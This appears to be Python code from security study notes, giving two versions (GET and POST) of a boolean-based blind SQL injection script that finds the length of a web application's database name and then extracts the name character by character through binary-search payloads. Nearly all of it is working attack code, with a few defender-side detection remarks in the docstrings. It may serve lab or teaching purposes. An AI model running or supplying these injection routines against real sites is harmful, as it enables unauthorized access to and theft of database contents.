def get_db_length():
    """Probe the length of the current database name via boolean-based blind injection.

    One GET request is sent per candidate length (1..29); the payload is appended
    to ``url`` and the presence of ``true_flag`` in the response body is taken as
    the "condition true" signal.  ``url``, ``true_flag`` and ``requests`` are not
    defined in this block — they are presumably module-level names set elsewhere
    in the file (not visible here).

    Returns:
        The first ``i`` for which the true-condition marker appears, or 0 when
        none of 1..29 matched.

    Detection note (defender's view): this loop emits a burst of near-identical
    requests that differ only in the numeric comparison, a recognisable pattern
    in access logs or WAF telemetry.
    """
    for i in range(1, 30):
        # Mirrors the basic-notes example: id=1' and length(database())=4 --+
        payload = f"' and length(database())={i}--+"
        target = url + payload
        res = requests.get(target)
        if true_flag in res.text:
            print(f"[+] 数据库长度为: {i}")
            return i
    return 0
def get_db_name(length):
    """Recover the database name one character at a time by binary search.

    For each position ``i`` in 1..``length`` the printable-ASCII range 32..126
    is narrowed with ``ascii(substring(database(), i, 1)) > mid`` comparisons;
    the presence of ``true_flag`` in the GET response decides which half to keep.
    ``url``, ``true_flag`` and ``requests`` are expected to be defined elsewhere
    in the file (not visible here).

    Args:
        length: number of characters to recover (as returned by get_db_length).

    Prints the partial name after each character and the final name; returns None.
    Note: if ``true_flag`` never appears for a position, ``low`` stays at 32 and a
    space is appended — there is no explicit "no match" handling here.
    """
    db_name = ""
    for i in range(1, length + 1):
        low = 32    # lower bound of printable ASCII
        high = 126  # upper bound of printable ASCII
        while low <= high:
            mid = (low + high) // 2
            # Mirrors the basic-notes example: id=1' and ascii(substring(database(),1,1))>97 --+
            payload = f"' and ascii(substring(database(),{i},1))>{mid}--+"
            target = url + payload
            res = requests.get(target)
            if true_flag in res.text:
                # Page rendered normally: the code is greater than mid, move the window right
                low = mid + 1
            else:
                # Page abnormal: the code is <= mid, move the window left
                high = mid - 1
        # On loop exit low == high + 1, which is the resolved character code
        db_name += chr(low)
        print(f"[*] 当前爆破进度: {db_name}")
    print(f"[+] 最终数据库名为: {db_name}")
if __name__ == "__main__":
    # Entry point: resolve the name length first, then recover the name
    # character by character.  A length of 0 means the length probe found nothing.
    length = get_db_length()
    if length > 0:
        get_db_name(length)
def get_db_length():
    """Probe the length of the current database name via boolean-based blind injection (POST variant).

    One POST request is sent per candidate length (1..29); the payload is placed
    in the form field named by ``inject_param`` and the presence of ``true_flag``
    in the response body is taken as the "condition true" signal.  ``url``,
    ``true_flag``, ``inject_param`` and ``requests`` are not defined in this
    block — they are presumably module-level names set elsewhere in the file.

    Returns:
        The first ``i`` for which the true-condition marker appears, or 0 when
        none of 1..29 matched.

    Detection note (defender's view): a burst of POSTs to one endpoint whose
    only variation is the numeric comparison in a single form field is a
    recognisable pattern in request logs.
    """
    for i in range(1, 30):
        # Build the payload; it must include the original query value (here 1)
        # and the closing quote so the injected clause parses.
        payload = f"1' and length(database())={i}--+"
        # [Key change 3] Build the POST body as a dict.
        # Additional form fields (e.g. a password) could be added to this same
        # dict; the original notes give {inject_param: payload, "password": "123"}
        # as an example.
        data = {inject_param: payload}
        # [Key change 4] Use requests.post() and pass the body via the data= argument.
        res = requests.post(url, data=data)
        if true_flag in res.text:
            print(f"[+] 数据库长度为: {i}")
            return i
    return 0
def get_db_name(length):
    """Recover the database name one character at a time by binary search (POST variant).

    For each position ``i`` in 1..``length`` the printable-ASCII range 32..126
    is narrowed with ``ascii(substring(database(), i, 1)) > mid`` comparisons;
    each probe is POSTed in the ``inject_param`` form field and the presence of
    ``true_flag`` in the response decides which half to keep.  ``url``,
    ``true_flag``, ``inject_param`` and ``requests`` are expected to be defined
    elsewhere in the file (not visible here).

    Args:
        length: number of characters to recover (as returned by get_db_length).

    Prints the partial name after each character and the final name; returns None.
    Note: if ``true_flag`` never appears for a position, ``low`` stays at 32 and a
    space is appended — there is no explicit "no match" handling here.
    """
    db_name = ""
    for i in range(1, length + 1):
        low = 32    # lower bound of printable ASCII
        high = 126  # upper bound of printable ASCII
        while low <= high:
            mid = (low + high) // 2
            payload = f"1' and ascii(substring(database(),{i},1))>{mid}--+"
            data = {inject_param: payload}
            res = requests.post(url, data=data)
            if true_flag in res.text:
                # Page rendered normally: the code is greater than mid, move the window right
                low = mid + 1
            else:
                # Page abnormal: the code is <= mid, move the window left
                high = mid - 1
        # On loop exit low == high + 1, which is the resolved character code
        db_name += chr(low)
        print(f"[*] 当前爆破进度: {db_name}")
    print(f"[+] 最终数据库名为: {db_name}")
if __name__ == "__main__":
    # Entry point: resolve the name length first, then recover the name
    # character by character.  A length of 0 means the length probe found nothing.
    length = get_db_length()
    if length > 0:
        get_db_name(length)